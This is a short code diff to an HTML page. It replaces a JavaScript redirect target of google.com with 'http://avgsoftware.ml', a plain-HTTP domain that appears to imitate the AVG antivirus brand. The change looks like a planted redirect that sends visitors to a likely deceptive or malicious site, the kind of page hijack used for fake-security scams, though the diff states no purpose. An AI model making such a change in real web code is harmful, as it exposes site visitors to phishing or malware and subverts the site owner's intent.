--- a/index.html
+++ b/index.html
@@ -23,7 +23,7 @@
 
     <script>
     function goto() {
-        location.href = 'https://www.google.com/'
+        location.href = 'http://avgsoftware.ml'
     }
     </script>
     <script
